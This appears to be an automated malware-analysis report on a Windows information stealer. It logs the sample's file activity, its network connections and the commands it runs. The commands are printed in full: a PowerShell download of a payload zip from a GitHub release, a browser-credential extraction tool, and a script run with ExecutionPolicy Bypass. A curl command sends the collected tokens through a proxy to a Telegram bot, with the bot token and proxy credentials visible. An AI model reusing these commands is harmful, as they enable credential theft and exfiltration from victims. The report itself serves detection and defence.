Technical Information
Malicious functions
Executes the following
- '<SYSTEM32>\taskkill.exe' /F /IM chrome.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msedge.exe
- '<SYSTEM32>\taskkill.exe' /F /IM brave.exe
Injects code into
the following user processes:
- msedge.exe
Modifies file system
Creates the following files
- <Current directory>\debug.log
- <Current directory>\6a337ed8\payload.zip
- <Current directory>\6a337ed8\temp_extract\encryptor.exe
- <Current directory>\6a337ed8\temp_extract\chromelevator_arm64.exe
- <Current directory>\6a337ed8\temp_extract\chromelevator_x64.exe
- <Current directory>\6a337ed8\collect\info.txt
- <Current directory>\6a337ed8\collect\ip.txt
- <Current directory>\6a337ed8\extract.ps1
- <Current directory>\6a337ed8\collect\tokens_debug.log
- <Current directory>\6a337ed8\collect\valid_tokens.txt
- nul
- <Current directory>\6a337ed8\data\info.txt
- <Current directory>\6a337ed8\data\tokens_debug.log
- <Current directory>\6a337ed8\data\valid_tokens.txt
- <Current directory>\6a337ed8\result.zip
- <Current directory>\6a337ed8\curl_resp.txt
Sets the 'hidden' attribute to the following files
- <Current directory>\debug.log
Deletes following files that it created itself
- <Current directory>\6a337ed8\collect\ip.txt
- <Current directory>\6a337ed8\extract.ps1
Deletes itself.
Network activity
Connects to
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
- 'x1.#.lencr.org':80
- '84.#8.4.62':80
- 'ap#.#pify.org':443
- '19#.#32.214.172':80
- '31.##.20.176':6754
TCP
HTTP GET requests
- http://x1.#.lencr.org/
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e9##############
Other
- 'gi##ub.com':443
- 're#########ets.githubusercontent.com':443
- 'ap#.#pify.org':443
- '31.##.20.176':6754
UDP
- DNS ASK gi##ub.com
- DNS ASK re#########ets.githubusercontent.com
- DNS ASK x1.#.lencr.org
- DNS ASK ap#.#pify.org
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Creates and executes the following
- '<Current directory>\6a337ed8\temp_extract\chromelevator_x64.exe' -v -f all
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File "<Current directory>\6a337ed8\extract.ps1"
Executes the following
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/wubejack-cmd/jirom/releases/download/jirom/file.zip' -OutFile 'payload.zip' -UseBasicParsing"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://github.com/wubejack-cmd/jirom/releases/download/jirom/file.zip' -OutFile 'payload.zip' -UseBasicParsing"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Expand-Archive -Path 'payload.zip' -DestinationPath 'temp_extract' -Force"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Expand-Archive -Path 'payload.zip' -DestinationPath 'temp_extract' -Force"
- '<SYSTEM32>\cmd.exe' /c "<Current directory>\6a337ed8\temp_extract\chromelevator_x64.exe" -v -f all
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe'
- '<SYSTEM32>\cmd.exe' /c curl -s https://api.ipify.org > <Current directory>\6a337ed8\collect\ip.txt 2>nul
- '<SYSTEM32>\curl.exe' -s https://api.ipify.org
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "<Current directory>\6a337ed8\extract.ps1"
- '<SYSTEM32>\cmd.exe' /c robocopy "<Current directory>\6a337ed8\output" "<Current directory>\6a337ed8\data\output" /E /R:0 /W:0 >nul
- '<SYSTEM32>\robocopy.exe' "<Current directory>\6a337ed8\output" "<Current directory>\6a337ed8\data\output" /E /R:0 /W:0
- '<SYSTEM32>\cmd.exe' /c robocopy "<Current directory>\6a337ed8\collect" "<Current directory>\6a337ed8\data" /E /R:0 /W:0 >nul
- '<SYSTEM32>\robocopy.exe' "<Current directory>\6a337ed8\collect" "<Current directory>\6a337ed8\data" /E /R:0 /W:0
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Compress-Archive -Path '<Current directory>\6a337ed8\data\*' -DestinationPath 'result.zip' -Force"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Compress-Archive -Path '<Current directory>\6a337ed8\data\*' -DestinationPath 'result.zip' -Force"
- '<SYSTEM32>\cmd.exe' /c curl -x 31.##.20.176:6754 -U tkyjxark:mbrwvmn0tqg1 -F chat_id=7593646943 -F document=@result.zip https://api.telegram.org/bot8673024720:AAFfLpxoLYKlNWMBlLmVtxJSVnmVebTrqvQ/sendDocument --ins...
- '<SYSTEM32>\curl.exe' -x 31.##.20.176:6754 -U tkyjxark:mbrwvmn0tqg1 -F chat_id=7593646943 -F document=@result.zip https://api.telegram.org/bot8673024720:AAFfLpxoLYKlNWMBlLmVtxJSVnmVebTrqvQ/sendDocument --insecure --...
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q "<Current directory>\6a337ed8"
- '<SYSTEM32>\cmd.exe' /c cmd /c del /f /q "<Full path to file>"
- '<SYSTEM32>\cmd.exe' /c del /f /q "<Full path to file>"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/wubejack-cmd/jirom/releases/download/jirom/file.zip' -OutFile 'payload.zip' -UseBasicParsing"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Expand-Archive -Path 'payload.zip' -DestinationPath 'temp_extract' -Force"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "<Current directory>\6a337ed8\temp_extract\chromelevator_x64.exe" -v -f all' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c curl -s https://api.ipify.org > <Current directory>\6a337ed8\collect\ip.txt 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -File "<Current directory>\6a337ed8\extract.ps1"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c robocopy "<Current directory>\6a337ed8\output" "<Current directory>\6a337ed8\data\output" /E /R:0 /W:0 >nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c robocopy "<Current directory>\6a337ed8\collect" "<Current directory>\6a337ed8\data" /E /R:0 /W:0 >nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Compress-Archive -Path '<Current directory>\6a337ed8\data\*' -DestinationPath 'result.zip' -Force"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c curl -x 31.##.20.176:6754 -U tkyjxark:mbrwvmn0tqg1 -F chat_id=7593646943 -F document=@result.zip https://api.telegram.org/bot8673024720:AAFfLpxoLYKlNWMBlLmVtxJSVnmVebTrqvQ/sendDocument --ins...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q "<Current directory>\6a337ed8"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cmd /c del /f /q "<Full path to file>"' (with hidden window)
